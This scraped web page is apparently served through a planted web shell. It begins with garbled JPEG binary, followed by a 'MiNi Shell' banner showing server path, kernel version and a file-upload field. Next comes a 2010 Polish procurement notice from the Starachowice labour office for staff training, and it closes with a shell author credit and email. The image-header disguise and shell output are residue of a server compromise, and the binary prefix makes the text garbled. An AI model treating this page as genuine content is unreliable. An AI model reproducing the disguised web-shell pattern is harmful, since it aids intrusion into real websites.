JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/133189-N-2010.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia specjalistycznego dla 13 pracowników PUP w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą-uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego Działanie 6.1 Poddziałanie 6.1.2 Program Operacyjny Kapitał Ludzki mającego na celu podniesienie kwalifikacji zawodowych pośredników pracy oraz doradców zawodowych realizujących zadania wynikające z ustawy o promocji zatrudnienia i instytucjach rynku pracy: Indywidualny Plan Działania - podstawowa metoda pracy doradcy zawodowego i pośredników pracy.</b><br>
<b>Numer ogłoszenia: 133189 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 0-41 275-45-38/39, faks 0-41 274-06-40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia specjalistycznego dla 13 pracowników PUP w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą-uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego Działanie 6.1 Poddziałanie 6.1.2 Program Operacyjny Kapitał Ludzki mającego na celu podniesienie kwalifikacji zawodowych pośredników pracy oraz doradców zawodowych realizujących zadania wynikające z ustawy o promocji zatrudnienia i instytucjach rynku pracy: Indywidualny Plan Działania - podstawowa metoda pracy doradcy zawodowego i pośredników pracy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia specjalistycznego dla 13 pracowników Powiatowego Urzędu Pracy w Starachowicach w ramach projektu: Profesjonalizm naszą dewizą-uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego Działanie 6.1 Poddziałanie 6.1.2 Program Operacyjny Kapitał Ludzki mającego na celu podniesienie kwalifikacji zawodowych pośredników pracy oraz doradców zawodowych realizujących zadania wynikające z ustawy o promocji zatrudnienia 
i instytucjach rynku pracy: Indywidualny Plan Działania - podstawowa metoda pracy 
doradcy zawodowego i pośrednika pracy
Kod zgodnie ze słownikiem CPV 80510000-2.
- Celem szkolenia jest właściwa realizacja Indywidualnego Planu Działania obejmującego 
      podstawowe usługi rynku pracy wspierane instrumentami rynku pracy w celu zatrudnienia 
      bezrobotnego lub poszukującego pracy. 
- Szkolenie ma zostać przeprowadzone w 2 grupach.
- Liczbę skierowanych pracowników do grupy określa Zamawiający.
- Przewiduje się że będą to grupy: I grupa 7 osób, II grupa 6 osób.
- Szkolenie ma zostać zorganizowane i przeprowadzone w okresie 01.07.2010 - 30.11. 
      2010 r.
- Terminy szkoleń nie mogą się pokrywać.
- Proponowana liczba godzin około 20 dla jednej grupy - według przedłożonego 
      szczegółowego programu szkolenia.
- Czas trwania szkolenia 3 dni dla jednej grupy.
- Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby  
      zajęcia odbywały się codziennie w dni powszednie.
- Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni 
      ustawowo wolne od pracy.
- Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
- Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
- Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
      przeprowadzenia szkolenia.
- Wykonawca zapewni warunki szkolenia oraz zakwaterowania zgodne z przepisami 
      bezpieczeństwa i higieny pracy. 
- Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały piśmienne 
      (zeszyt, długopis, itp.), pomoce dydaktyczne niezbędne do realizacji szkolenia oraz 
      harmonogram szkolenia.
- Wykonawca zapewni ubezpieczenie dla uczestników szkolenia od pierwszego do   
       ostatniego dnia szkolenia.  
- Po zakończeniu szkolenia Wykonawca zamówienia wyda odpowiedni certyfikat; dyplom;  
      zaświadczenie o ukończeniu szkolenia opatrzony logo Program Operacyjny Kapitał
      Ludzki oraz flagą Unii Europejskiej. 
- Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
      bliżej niż 60 km i nie dalej niż 300 km od granicy miasta Starachowice.
- Wykonawca zapewni zakwaterowanie (przynajmniej dwa noclegi) dla  pracowników   
      skierowanych na szkolenie. 
- Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników 
      szkolenia lub w odległości nie większej niż 1 km od miejsca zakwaterowania. 
      W przypadku gdy zajęcia odbywać się będą w odległości większej niż 1 km od miejsca 
      zakwaterowania uczestników Wykonawca zapewni transport na i z miejsca odbywania  
      zajęć.  
- Uczestnicy szkolenia zostaną zakwaterowani w hotelach co najmniej dwu gwiazdkowych 
      lub pensjonatach o równorzędnym standardzie w pokojach 2 lub 1 osobowych 
      wyposażonych w węzeł sanitarny.
- Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników 
      szkolenia (śniadanie, obiad, kolacja) oraz serwis kawowy podczas trwania zajęć. 
- W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu 
      rozpoczęcia szkolenia Wykonawca zapewni nocleg zgodny z w/w opisem oraz kolację
      w przeddzień szkolenia. 
- Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót 
      uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
-  Zamawiający przewiduje możliwość zmiany np: (ze strony Wykonawcy) trenerów 
      prowadzących szkolenie, opiekuna grupy, miejsca przeprowadzenia szkolenia, (ze strony 
      Zamawiającego) terminów wykonania usługi, liczby uczestników szkolenia przed 
      jego rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia Zamawiający 
      dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób 
      przeszkolonych i kosztu przeszkolenia jednej osoby)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku 1 (posiadanie uprawnień) 
-  Na podstawie złożonego aktualnego odpisu z właściwego rejestru albo aktualne 
       zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy  
       wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej 
       wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
       Dokument można złożyć w formie oryginału lub kopii poświadczonej za zgodność
       z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy wskazaną 
       w zaświadczeniu o wpisie do ewidencji działalności gospodarczej lub w odpisie 
       z właściwego rejestru. W przypadku osób działających jako pełnomocnicy do oferty  
        należy dołączyć pełnomocnictwo w formie oryginału lub formie poświadczonej 
        notarialnie kopii.
-   Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
       publicznych - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku 2 (wiedza i doświadczenie) 
-      Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie w okresie ostatnich 3 lat,  
       a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej trzech   
       szkoleń o tej samej lub podobnej tematyce.
-  Spełnienie warunku nastąpi na podstawie złożonych dokumentów potwierdzających   
      przeprowadzenie przynajmniej trzech szkoleń o tej samej lub podobnej tematyce.  
      Dokumentami potwierdzającymi przeprowadzenie szkoleń mogą być np. listy         
       referencyjne. 
-   Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
       publicznych - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku 3 (potencjał techniczny) 
-    Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień publicznych - załącznik nr 1 do SIWZ,    
-   Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem 
        technicznym zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 
        do SIWZ. W przypadku użyczania przez Wykonawcę bazy szkoleniowej spełnienie 
        warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia - załącznik 
        nr 2 do SIWZ
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku 3 (osoby zdolne do wykonywania zamówienia) 
-    Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
        publicznych - załącznik nr 1 do SIWZ,    
-      Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania   
        przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na spełnienie warunku 4 (sytuacja ekonomiczna i finansowa) 
-  Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację 
        przedmiotu zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem  
        podatków oraz o niezaleganiu z opłacaniem opłat oraz składek na ubezpieczenie 
        zdrowotne i społeczne ewentualnie oświadczenie o uzyskaniu przewidzianym prawem 
        zwolnieniu, odroczeniu lub rozłożeniu na raty zaległych płatności - załącznik nr 4 do 
        SIWZ.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia                              
dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kryterium doświadczenie Wykonawcy - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany np: (ze strony Wykonawcy) trenerów 
      prowadzących szkolenie, opiekuna grupy, miejsca przeprowadzenia szkolenia, (ze strony Zamawiającego) terminów wykonania usługi, liczby uczestników szkolenia przed 
      jego rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia Zamawiający 
      dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób 
      przeszkolonych i kosztu przeszkolenia jednej osoby).
   Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej 
     zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, 
     czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić 
     od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
     wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl ,zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 12:00, miejsce: Oferty należy składać w siedzibie zamawiającego tj: 
Powiatowy Urząd Pracy w Starachowicach, 27-200 Starachowice ul. Radomska 76,    
w pokoju 210 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach projektu: Profesjonalizm naszą dewizą-uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego Funduszu Społecznego Działanie 6.1 Poddziałanie 6.1.2 Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com